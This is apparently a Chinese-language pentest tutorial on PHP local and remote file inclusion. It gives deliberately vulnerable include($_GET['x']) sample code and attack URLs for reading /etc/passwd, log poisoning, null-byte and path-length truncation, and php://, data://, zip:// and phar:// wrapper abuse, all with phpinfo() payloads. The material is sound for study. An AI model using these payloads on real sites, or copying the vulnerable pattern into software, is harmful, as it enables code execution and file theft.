0x01 文件包含漏洞定义

文件包含漏洞的产生原因是在通过 PHP的函数引入文件里,由于传入的文件名称没有经过合理的检验。
从而导致引入了开发者预想之外的文件。(注:包含的文件会被当成脚本文件来解析)

文件包含分为本地和远程文件包含

远程文件包含:可以直接执行任意代码

  • 要保证php.ini 中 allow_url_fopen 和 allow_url_include 都要为 On

0x02 文件包含的相关函数

相关的PHP函数 功能解释 错误时的操作
include 语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中 引入的文件有错误时,只生成警告(E_WARNING),并且脚本会继续执行脚本
include_once 此行为和 include 语句功能类似,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。
require 语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 require 语句的文件中 引入的文件有错误时,会生成致命错误(E_COMPILE_ERROR)并停止脚本运行
require_once 与 require 语句功能类似,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。
PHP函数 功能解释
highlight_file 函数对文件进行语法高亮显示
show_source 函数对文件进行语法高亮显示
readfile 函数读取一个文件,并写入到输出缓冲

如果成功,该函数返回从文件中读入的字节数。如果失败,该函数返回 FALSE 并附带错误信息。您可以通过在函数名前面添加一个 ‘@’ 来隐藏错误输出
file_get_contents 函数把整个文件读入一个字符串中
fopen 函数打开文件或者 URL
file 函数把整个文件读入一个数组中

这里不会讲某个函数的利用,只会大概的讲讲

0x03 漏洞危害

  • 执行任意代码
  • 读取文件源码或敏感信息

0x03 文件包含利用

  1. # 例如: 这个示例代码
  2. # 文件名称: 1.php
  3. <?php
  4. if(isset($_GET['x']))
  5. {
  6. include $_GET['x'];
  7. }
  8. ?>

0x03.1 远程文件包含-执行代码

记得远程文件包含要使用要保证php.ini 中 allow_url_fopen 和 allow_url_include 都要为 On

受害者域名: http://atest.test

攻击者域名: http://ccccc.test
攻击者文件: 1.txt

  1. # 文件 1.txt 代码
  2. <?php phpinfo(); ?>

攻击的时候: http://atest.test/1.php?x=http://ccccc.test/1.txt
image.png

0x03.2 本地文件包含-执行代码

0x03.2.1 图片马写shell

受害者域名: http://atest.test

假设受害者服务器有一个上传功能,但是只能上传一张图片。
这时候我们就可以在受害者的服务器的上传接口上传一张带有木马的图片

攻击的时候: http://atest.test/1.php?x=./1.jpg
image.png

0x03.2.2 包含日志GetShell(需要得到日志的路径)

日志会记录客户端请求及服务器响应的信息

例如访问: http://atest.test/<?php phpinfo(); ?>时,<?php phpinfo(); ?>就会被记录在日志里

image.png

image.png

image.png

系统 服务器 可能的错误日志的位置
windows apache ./Apache/logs/error.log
windows nginx ./nginx/logs/error.log
linux apache /var/log/apache2/error.log
linux apache /var/log/httpd/error.log
linux apache /etc/httpd/logs/error.log
linux nginx /var/log/nginx

我本地使用的是phpStudy所以日志位置在:D:\phpStudy\PHPTutorial\Apache\logs\error.log

攻击的时候: http://atest.test/1.php?x=D:\phpStudy\PHPTutorial\Apache\logs\error.log
image.png

0x04 本地包含读文件

这个其实没啥好说的

0x04.1 windows读取文件

攻击的时候: http://atest.test/1.php?x=C:\Windows\win.ini

image.png

image.png

0x04.2 linux读取文件

攻击的时候: http://atest.test/1.php?x=/etc/passwd

0x04.3 读PHP文件源码

如果说我们直接包含php文件的话会被解析,导致不能看到源码,所以可以用封装协议读取文件

例如我们攻击的时候: http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=1.php

表示读取1.php 这个文件的源码
image.png

image.png

0x05 截断绕过

  1. # 例如这样限制了我们只能包含 .html 的文件
  2. # 文件名称: 2.php
  3. <?php
  4. if(isset($_GET['x']))
  5. {
  6. include $_GET['x'] . '.html';
  7. }
  8. ?>

需要的环境

  • php版本小于5.3.4
  • magic_quotes_gpc 为 off 状态

如果上面的条件满足的话,就可以使用这个方法来进行绕过

0x05.1 %00截断


受害者域名: http://atest.test

0x05.1.1 本地文件包含攻击

  1. # 1.jpg 的代码
  2. # 怎么上传的自己看实际情况
  3. <?php phpinfo(); ?>

本地文件包含攻击: http://atest.test/2.php?x=./1.jpg%00

0x05.1.2 远程文件包含攻击

记得远程文件包含要使用要保证php.ini 中 allow_url_fopen 和 allow_url_include 都要为 On

攻击者域名: http://ccccc.test
攻击者文件: 1.txt

  1. # 文件 1.txt 代码
  2. <?php phpinfo(); ?>

远程文件包含攻击: http://atest.test/2.php?x=http://ccccc.test/1.jpg%00

0x05.2 路径长度截断

需要的环境

  • php版本小于5.3.10

绕过方法: 使用字符

  • .
  • /.
  • ./

(注意顺序)来截断,因为文件路径有长度限制

系统文件路径长度限制:
windows 259个bytes
linux 4096个bytes

  1. # 1.jpg 的代码
  2. # 怎么上传的自己看实际情况
  3. <?php phpinfo(); ?>
  1. 本地文件包含攻击:http://atest.test/2.php?x=1.jpg...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
  1. 本地文件包含攻击:http://atest.test/2.php?x=1.jpg./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
  1. 本地文件包含攻击:http://atest.test/2.php?x=1.jpg/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

0x06 使用PHP伪协议绕过一些限制

协议 功能
file:// 访问本地文件系统
http:// 访问 HTTP(S) 网址
ftp:// 访问 FTP(S) URL
php:// 访问各个输入/输出流(I/O streams)
zlib:// 压缩流
data:// 数据(RFC 2397)
glob:// 查找匹配的文件路径模式
phar:// PHP 归档
ssh2:// Secure Shell 2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流
  1. # 例如: 这个示例代码
  2. # 文件名称: 1.php
  3. <?php
  4. if(isset($_GET['x']))
  5. {
  6. include $_GET['x'];
  7. }
  8. ?>

0x06.1 file://协议

  1. PHP.ini
  2. file:// 协议在双off的情况下也可以正常使用;
  3. allow_url_fopen off/on
  4. allow_url_includeoff/on

file:// 用于访问本地文件

file:// [文件的绝对路径和文件名]

打开: http://atest.test/1.php?x=file://E:/WWW/1.jpg

image.png

0x06.2 php://协议

  1. php://filter在双off的情况下也可以正常使用;
  2. 条件:
  3. 不需要开启allow_url_fopen
  4. php://input、 php://stdin、 php://memory 和 php://temp 需要开启 allow_url_include。

php:// 访问各个输入/输出流(I/O streams)

在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码
php://input用于执行php代码

0x06.2.1 php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

  1. resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。
  2. read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
  3. write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
  4. <;两个链的筛选列表> 任何没有以 read= write= 作前缀 的筛选器列表会视情况应用于读或写链。

可以运用多种过滤器(字符串/转换/压缩/加密)
例如平时我们用来任意文件读取的payload

image.png

  1. http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=upload.php
  2. 这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode
  3. resource=upload.php,代表读取upload.php的内容

这样就可以以base64编码的方式读取文件源代码

过滤器

过滤器有很多种,有字符串过滤器、转换过滤器、压缩过滤器、加密过滤器

<字符串过滤器>

  1. string.rot13
  2. 进行rot13转换
  3. string.toupper
  4. 将字符全部大写
  5. string.tolower
  6. 将字符全部小写
  7. string.strip_tags
  8. 去除空字符、HTML PHP 标记后的结果。
  9. 功能类似于strip_tags()函数,若不想某些字符不被消除,后面跟上字符,可利用字符串或是数组两种方式。

举例

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'string.rot13');
  4. echo "rot13:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $fp = fopen('php://output', 'w');
  9. stream_filter_append($fp, 'string.toupper');
  10. echo "Upper:";
  11. fwrite($fp, "This is a test.\n");
  12. fclose($fp);
  13. echo "<br>";
  14. $fp = fopen('php://output', 'w');
  15. stream_filter_append($fp, 'string.tolower');
  16. echo "Lower:";
  17. fwrite($fp, "This is a test.\n");
  18. fclose($fp);
  19. echo "<br>";
  20. $fp = fopen('php://output', 'w');
  21. echo "Del1:";
  22. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE);
  23. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  24. fclose($fp);
  25. echo "<br>";
  26. $fp = fopen('php://output', 'w');
  27. echo "Del2:";
  28. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "<b>");
  29. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  30. fclose($fp);
  31. echo "<br>";
  32. $fp = fopen('php://output', 'w');
  33. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1'));
  34. echo "Del3:";
  35. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  36. fclose($fp);
  37. ?>

image.png

<转换过滤器>

image.png

举例:

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'convert.base64-encode');
  4. echo "base64-encode:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $param = array('line-length' => 8, 'line-break-chars' => "\n");
  9. $fp = fopen('php://output', 'w');
  10. stream_filter_append($fp, 'convert.base64-encode', STREAM_FILTER_WRITE, $param);
  11. echo "\nbase64-encode-split:\n";
  12. fwrite($fp, "This is a test.\n");
  13. fclose($fp);
  14. echo "<br>";
  15. $fp = fopen('php://output', 'w');
  16. stream_filter_append($fp, 'convert.base64-decode');
  17. echo "\nbase64-decode:";
  18. fwrite($fp, "VGhpcyBpcyBhIHRlc3QuCg==\n");
  19. fclose($fp);
  20. echo "<br>";
  21. $fp = fopen('php://output', 'w');
  22. stream_filter_append($fp, 'convert.quoted-printable-encode');
  23. echo "quoted-printable-encode:";
  24. fwrite($fp, "This is a test.\n");
  25. fclose($fp);
  26. echo "<br>";
  27. $fp = fopen('php://output', 'w');
  28. stream_filter_append($fp, 'convert.quoted-printable-decode');
  29. echo "\nquoted-printable-decode:";
  30. fwrite($fp, "This is a test.=0A");
  31. fclose($fp);
  32. echo "<br>";
  33. ?>

image.png

<压缩过滤器>

image.png

zlib.* 压缩过滤器自 PHP 版本 5.1.0起可用,在激活 zlib的前提下。也可以通过安装来自 » PECL的 » zlib_filter包作为一个后门在 5.0.x版中使用。

此过滤器在 PHP 4 中 不可用。

  1. <?php
  2. $params = array('level' => 6, 'window' => 15, 'memory' => 9);
  3. $original_text = "This is a test.\nThis is only a test.\nThis is not an important string.\n";
  4. echo "The original text is " . strlen($original_text) . " characters long.\n";
  5. $fp = fopen('test.deflated', 'w');
  6. stream_filter_append($fp, 'zlib.deflate', STREAM_FILTER_WRITE, $params);
  7. fwrite($fp, $original_text);
  8. fclose($fp);
  9. echo "The compressed file is " . filesize('test.deflated') . " bytes long.\n";
  10. echo "The original text was:\n";
  11. /* Use readfile and zlib.inflate to decompress on the fly */
  12. readfile('php://filter/zlib.inflate/resource=test.deflated');
  13. /* Generates output:
  14. The original text is 70 characters long.
  15. The compressed file is 56 bytes long.
  16. The original text was:
  17. This is a test.
  18. This is only a test.
  19. This is not an important string.
  20. */
  21. ?>

<加密过滤器>

image.png

0x06.3 php://filter 读PHP文件源码

如果说我们直接包含php文件的话会被解析,导致不能看到源码,所以可以用封装协议读取文件

例如我们攻击的时候: http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=1.php

表示读取1.php 这个文件的源码
image.png

image.png

0x06.4 php://input 执行代码

php://input 是个可以访问请求的原始数据的只读流,可以读取到post没有解析的原始数据, 将post请求中的数据作为PHP代码执行。

因为它不依赖于特定的 php.ini 指令。
注:enctype=”multipart/form-data” 的时候 php://input 是无效的。

  1. allow_url_fopen off/on # 开启关闭都可以
  2. allow_url_includeon # 必须开启

image.png

0x06.4 php://output

是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。

  1. <?php
  2. $code=$_GET["a"];
  3. file_put_contents($code,"test");
  4. ?>

image.png

0x06.5 data://


data:资源类型;编码,内容
数据流封装器
当allow_url_include 打开的时候,任意文件包含就会成为任意命令执行

  1. PHP.ini
  2. data://协议必须双在on才能正常使用;
  3. allow_url_fopen on
  4. allow_url_includeon
  5. php 版本大于等于 php5.2
  1. # 测试代码
  2. # 文件名称: xxx.php
  3. <?php
  4. $filename=$_GET["a"];
  5. include("$filename");
  6. ?>
  1. 利用方法
  2. http://127.0.0.1/xxx.php?a=data://text/plain,<?php phpinfo()?>
  3. or
  4. http://127.0.0.1/xxx.php?a=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  5. 或者
  6. http://127.0.0.1/xxx.php?a=data:text/plain,<?php phpinfo()?>
  7. or
  8. http://127.0.0.1/xxx.php?a=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

image.png

0x06.6 zip://, bzip2://, zlib://协议

  1. PHP.ini
  2. zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;
  3. allow_url_fopen off/on
  4. allow_url_includeoff/on
  1. 3个封装协议,都是直接打开压缩文件。
  2. compress.zlib://file.gz - 处理的是 '.gz' 后缀的压缩包
  3. compress.bzip2://file.bz2 - 处理的是 '.bz2' 后缀的压缩包
  4. zip://archive.zip#dir/file.txt - 处理的是 '.zip' 后缀的压缩包里的文件

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

zip://协议

php 版本大于等于 php5.3.0
使用方法:
zip://archive.zip#dir/file.txt
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]**
要用绝对路径+url编码#

测试:
新建一个名为zip.txt的文件,内容为<?php phpinfo();?>,然后压缩为名为test.zip的zip文件。

如果可以上传zip文件则上传zip文件,若不能则重命名为test.jpg后上传。

其他几种压缩格式也可以这样操作。
image.png
更名为jpg

payload:http://127.0.0.1/xxx.php?a=zip://C:\Users\liuxianglai\Desktop\test.jpg%23zip.txt

image.png

bzip2://协议


使用方法:
compress.bzip2://file.bz2
相对路径也可以

测试
用7-zip生成一个bz2压缩文件。
pyload:http://127.0.0.1/xxx.php?a=compress.bzip2://C:/Users/liuxianglai/Desktop/test.bz2
或者文件改为jpg后缀
http://127.0.0.1/xxx.php?a=compress.bzip2://C:/Users/liuxianglai/Desktop/test.jpg

image.png

zlib://协议

使用方法:
compress.zlib://file.gz
相对路径也可以

http://127.0.0.1/xxx.php?a=compress.zlib://file.gz

image.png

  1. # 1.jpg 代码
  2. <?php phpinfo(); ?>

image.png

0x06.7 php伪协议结

image.png

0x07 小例子

  1. # 例如这样限制了我们只能包含 .html 的文件
  2. # 文件名称: 2.php
  3. <?php
  4. if(isset($_GET['x']))
  5. {
  6. include $_GET['x'] . '.html';
  7. }
  8. ?>

限制了只能包含 .xxx 文件的绕过方法

0x07.1 绕过方法一 - zip协议

新建一个名为1.html的文件,内容为<?php phpinfo();?>,然后压缩为名为111.zip的zip文件。

接着利用网站的上传功能上传文件

image.png

攻击payload: http://atest.test/2.php?x=zip://111.zip%231
image.png

0x07.2 绕过方法二 - zip协议

有的上传点可能限制死了,你只能上传jpg的图片那么你可以这样做

新建一个名为1.html的文件,内容为<?php phpinfo();?>,然后压缩为名为111.zip的zip文件。

接着 111.zip 改名为 111.jpg

攻击payload: http://atest.test/2.php?x=zip://111.jpg%231
image.png

0x07.3 绕过方法三 - phar协议


新建一个名为1.html的文件,内容为<?php phpinfo();?>,然后压缩为名为111.zip的zip文件。

如果可以上传zip文件则上传zip文件,若不能则重命名为111.jpg后上传。

攻击payload-1: http://atest.test/2.php?x=phar://111.jpg%2F1

攻击payload-2: http://atest.test/2.php?x=phar://111.zip%2F1

这两个payload 就看你能上传哪个文件了
如果可以上传 jpg 那么就使用payload-1
如果可以上传 zip 那么就使用payload-2